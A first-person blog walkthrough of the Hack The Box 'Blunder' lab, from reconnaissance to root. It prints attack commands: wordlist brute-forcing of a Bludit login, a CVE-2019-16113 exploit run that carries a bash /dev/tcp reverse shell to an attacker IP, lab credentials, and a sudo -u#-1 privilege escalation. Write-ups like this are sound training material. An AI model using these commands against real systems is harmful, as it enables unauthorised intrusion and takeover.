Hack The Box: Blunder Walkthrough

Hi Folks. This is my first HTB writeup so let me know what you think.

For anyone who doesn’t know, Hack The Box is an online platform designed for security researchers and penetration testers to test their skills against a range of life-like labs. The main area consists of different ‘boxes’ which are essentially systems which you can try and hack into. The main objective when completing each box is to bypass the security mechanisms in order to capture two ‘flags’, which are a coded string inside a text file. The first flag is the easier of the two to achieve as the hacker is only required to have user privileges on the server to read the file, accessing the second flag, however, requires root privileges which are the highest level of privilege available on a system. After achieving the root flag you have ‘owned’ the box, which is what I’m going to walk through today.

Reconnaissance

First, run a Nmap scan. Nmap is always the place to start when doing reconnaissance.

$ nmap -sV -sC -Pn 10.10.10.191

Nmap Scan

So there is an FTP port, but it is closed so not useful to us. Port 80 is open though so there is probably a website hosted on this server.

Home page of 10.10.10.191

There is indeed a website. As I navigate the site in Firefox I see that the site seems to just consist of two HTML pages; nothing of interest. Time to look for hidden content. I decide to use dirsearch to enumerate hidden files on the webpage.

python3 dirsearch.py -u 10.10.10.191 -e *

dirsearch revealed some hidden pages such as an admin page.

admin page

A quick search of ‘Bludit’ reveals it to be a CMS (Content Management System) which I note down. I spent some time investigating this page with Burp, to try and see how the page works, and use ZAP to try and look for potential flaws in the login page. No luck. Back to the drawing board now, I decide to continue looking for hidden content by fuzzing the page for files with different extensions. When searching for text files, I hit pay dirt.

$ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt — hc 404,403 -u “http://10.10.10.191/FUZZ.txt" -t 100

Wfuzz Results

The fuzzing revealed a “todo” text file. Inside it was some promising info.

-Update the CMS

-Turn off FTP — DONE

-Remove old users — DONE

-Inform fergus that the new blog needs images — PENDING

Foothold

While this may not seem like much information, I realised that fergus could well be a valid username for the admin login page, which is half the puzzle. Time to get a password. I use Cewl to scrape the website for words to create a wordlist to attack the login page.

$ cewl -w wordlists.txt -d 10 -m 1 http://10.10.10.191/

I then did some research into ‘Bludit’ login forms and potential exploits. With the help of a github.io post (https://rastating.github.io/bludit-brute-force-mitigation-bypass/ ), I build a brute-force program in Python. I hope to put this program on Github when I have time.

$ python3 brute.py

[*] Trying: fictional

[*] Trying: character

[*] Trying: RolandDeschain

SUCCESS: Password found!

Use fergus:RolandDeschain to login.

Success! Cewl managed to create an exhaustive wordlist and with the username fergus I crack the form. I can now login

Now I have access to the backend of the system, I resist the urge to deface the webpage to a video montage of cats doing evil things; instead researching opensource Bludit CMS. Vulnmon had a good page detailing an RCE (Remote Code Execution) vulnerability — CVE-2019–16113.

Bludit 3.9.2 allows remote code execution via bl-kernel/ajax/upload-images.php because PHP code can be entered with a .jpg file name, and then this PHP code can write other PHP code to a ../ pathname.

Exploitation

I look at how CVE-2019–16113 may be useful for me in this situation. I found a Metasploit module for the CVE however I could not properly configure this in a way the exploit would create a shell, maybe the system has auto-updated I’m not sure. After a long look through the internet, I am close to attempting to write my own exploit, but I came across this python script which should do exactly what I want.

I set up my netcat listener

$ nc -lvnp 4444

Time to run the exploit

$ sudo python3 CVE-2019–16113.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c “bash -c ‘bash -i >& /dev/tcp/10.10.15.100/4444 0>&1’”

Jackpot! The reverse connection has been made and I have a shell on the remote server. Time to hunt for the User flag. I run a command and find I am the user ‘www-data’.

$ whoami

whoami

www-data

I’ll just be safe and run a python command to ensure I have a good quality shell

$ python -c “import pty;pty.spawn(‘/bin/bash’)”

</tmp$ python -c “import pty;pty.spawn(‘/bin/bash’)”

Privilege Escalation

After some traversal, I find a users.php file in the databases folder of a different Bludit version (3.10.0a), perhaps the passwords of these users will be weaker as it is not public-facing; I read the file and find some interesting information.

$ cat users.php

The file shows a user called ‘Hugo’, and a hashed password. Back on my own terminal, I run the hashid command to identify the password hash. The hash is SHA-1. SHA-1 is a strong hashing algorithm and I know that using my own wordlists could take forever to find a match, instead, I can work in reverse. Due to the nature of hashing algorithms, a phrase which is passed through the algorithm will always output the same ciphertext, meaning if this user has chosen a weak password, someone may have already discovered the plaintext password for this hash. I head over to https://crackstation.net/

So we have the full login of a user in the admin group now. Time to elevate my privileges.

www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su hugo

su hugo

Password: Password120

hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$

I navigate to Hugo’s base directory and find the User.txt flag.

hugo@blunder:~$ cat user.txt

cat user.txt

e93f14a328725b131590e155b30e318b

Achieving Root

I run a cheeky one-liner in the hope of getting a sneaky root but no luck. Instead, running sudo -l revealed something interesting

User hugo may run the following commands on blunder:

(ALL, !root) /bin/bash

I research this output for clues and find an abuse of this permission, which allows me the root access I was looking for.

hugo@blunder:~$ sudo -u#-1 /bin/bash

sudo -u#-1 /bin/bash

Password: Password120

root@blunder:/home/hugo#

All there is left to do; navigate to the root directory and grab the flag.

root@blunder:/root# cat root.txt

cat root.txt

ae6009c1e4eb4123d5221d1d15439f71

Box Owned.

This was a fairly easy box however I found it very interesting and enjoyed pitting myself against it. If you got this far thanks for reading. Let me know if there is anything you think I should do differently next time in terms of formatting of pictures or code extract or even structure.

Signing off,

Ben

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
sharkmoos

sharkmoos

9 Followers

Novice Cyber Security Enthusiast. I like sharing what I’ve learnt